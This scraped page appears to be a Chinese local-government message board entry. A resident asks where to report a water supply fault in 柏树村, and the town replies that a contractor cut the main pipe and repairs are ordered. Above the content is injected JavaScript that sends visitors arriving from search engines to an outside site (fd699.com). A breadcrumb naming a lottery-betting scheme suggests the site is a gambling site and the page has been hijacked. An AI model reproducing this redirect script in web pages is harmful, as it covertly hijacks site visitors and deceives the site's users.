var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 咨询投诉

来信信息
信件编号: 16241834456277
信件类型: 我要咨询
来信标题: 柏树村自来水
来信时间: 2020-01-03
来信内容:
想咨询下柏树村自来水有问题应该咨询县政府哪个部门? 上次有个投诉信件结果不知道在哪里查询
回复内容
答复单位: 庐城镇
办理时间: 2020-01-06
回复内容:

尊敬的来信人:您好!

 经调查,该处自来水上游主管被新庄附近承包大户卢某挖断,现已督促修复。以后有关于自来水的任何问题,请和庐城镇水厂负责人员联系,我们已把相关号码告知您本人。

感谢您对我们工作的理解和支持。


留言评价
查询密码:
评价结果: